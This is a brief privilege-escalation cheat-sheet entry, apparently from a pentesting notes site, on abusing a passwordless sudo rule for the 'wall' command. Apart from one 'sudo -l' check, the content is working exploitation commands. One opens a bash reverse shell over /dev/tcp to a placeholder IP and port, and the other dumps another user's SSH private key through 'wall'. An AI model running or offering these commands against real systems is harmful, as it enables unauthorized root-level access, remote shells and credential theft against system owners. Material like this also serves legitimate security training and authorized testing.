Sudo Wall Privilege Escalation
Last modified: 2023-02-05
Wall command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc).
Investigation
sudo -l
(ALL) NOPASSWD: wall
Exploitation
# Reverse shell
sudo wall "$(bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1')"
# Gets a SSH private key of another user
sudo wall "$(cat /home/user/.ssh/id_rsa)"